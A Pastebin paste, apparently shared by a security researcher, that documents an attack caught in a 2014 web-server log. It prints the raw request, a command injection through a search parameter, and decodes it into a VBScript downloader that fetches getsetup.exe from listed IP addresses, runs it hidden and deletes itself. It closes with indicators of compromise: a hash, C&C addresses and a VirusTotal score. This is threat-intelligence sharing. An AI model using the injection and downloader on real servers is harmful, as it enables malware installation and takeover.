Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####
- thembits.blogspot.com
- @tehsyntx
- ####
- Raw logrow:
- 122.228.207.244 - - [24/Sep/2014:20:42:32 +0200] "GET /?search==%00{.exec|cmd.exe+%2Fc+echo%3E22222.vbs+dim+wait%2Cquit%2Cout%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3ASet+WshShell+%3D+Wscript.CreateObject%28%22WScript.Shel
- l%22%29+%3ADS%3DArray%28%22123.108.109.100%22%2C%22123.108.109.100%3A53%22%2C%22123.108.109.100%3A443%22%2C%22178.33.196.164%22%2C%22178.33.196.164%3A53%22%2C%22178.33.196.164%3A443%22%29%3Afor+each+Url+in+DS%3Await%3Dtrue%3Aquit%3Dfalse
- %3AD%28Url%29%3Aif+quit+then%3Aexit+for%3Aend+if%3Anext%3ASub+D%28Url%29%3Aif+IsObject%28xml%29%3Dfalse+then%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3Aend+if+%3Axml.Open+%22GET%22%2C%22http%3A%2F%2F%22%5E%26Url%5E%26%22%2Fg
- etsetup.exe%22%2CTrue%3Axml.OnReadyStateChange%3DGetRef%28%22xmlstat%22%29%3Aout%3DNow%3Axml.Send%28%29%3Awhile%28wait+and+60%5E%3Eabs%28datediff%28%22s%22%2CNow%2Cout%29%29%29%3Awscript.sleep%281000%29%3Awend%3AEnd+Sub%3Asub+xmlstat%28%
- 29%3AIf+xml.ReadyState%5E%3C%5E%3E4+Then%3Aexit+sub%3Aend+if%3Await%3Dfalse%3Aif+xml.status%5E%3C%5E%3E200+then%3Aexit+sub%3Aend+if%3Aquit%3Dtrue%3Aon+error+resume+next%3Aset+sGet%3DCreateObject%28%22ADODB.Stream%22%29%3AsGet.Mode%3D3%3A
- sGet.Type%3D1%3AsGet.Open%28%29%3AsGet.Write+xml.ResponseBody%3AsGet.SaveToFile+%22ko.exe%22%2C2%3AEnd+sub%3AWshShell.run+%22ko.exe%22%2C0%2C0%3ASet+fso+%3DCreateObject%28%22Scripting.Filesystemobject%22%29+%3Afso.DeleteFile%28WScript.Sc
- riptFullName%29+%26+cscript+22222.vbs.} HTTP/1.1" 200 518 "-" "-"
- ************************
- {.exec | cmd.exe / c echo > 22222.vbs dim wait, quit, out:
- Set xml = CreateObject("Microsoft.XMLHTTP"):
- Set WshShell = Wscript.CreateObject("WScript.Shell"):
- DS = Array("123.108.109.100", "123.108.109.100:53", "123.108.109.100:443", "178.33.196.164", "178.33.196.164:53", "178.33.196.164:443"):
- for each Url in DS:
- wait = true: quit = false:
- D(Url):
- if quit then:
- exit
- for: end
- if :next: Sub D(Url): if IsObject(xml) = false then: Set xml = CreateObject("Microsoft.XMLHTTP"): end
- if :xml.Open "GET",
- "http://" ^ & Url ^ & "/getsetup.exe",
- True: xml.OnReadyStateChange = GetRef("xmlstat"): out = Now: xml.Send(): while (wait and 60 ^ > abs(datediff("s", Now, out))): wscript.sleep(1000): wend: End Sub: sub xmlstat( %
- 29: If xml.ReadyState ^ < ^ > 4 Then: exit sub: end
- if :wait = false: if xml.status ^ < ^ > 200 then: exit sub: end
- if :quit = true: on error resume next: set sGet = CreateObject("ADODB.Stream"): sGet.Mode = 3:
- sGet.Type = 1: sGet.Open(): sGet.Write xml.ResponseBody: sGet.SaveToFile "ko.exe", 2: End sub: WshShell.run "ko.exe", 0, 0: Set fso = CreateObject("Scripting.Filesystemobject"): fso.DeleteFile(WScript.Sc riptFullName) & cscript 22222.vbs.
- }
- ************************
- getsetup.exe
- MD5: 519048ffc7f6c38ab8cb4e0ddac3fad3
- CnC: 66.102.253.25:666, 119.145.148.105:666
- VT: 40/54 (https://www.virustotal.com/en/file/ea817834fff18e40581f096371be2a7eb062325475805e2b9c51d186ac820137/analysis/)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement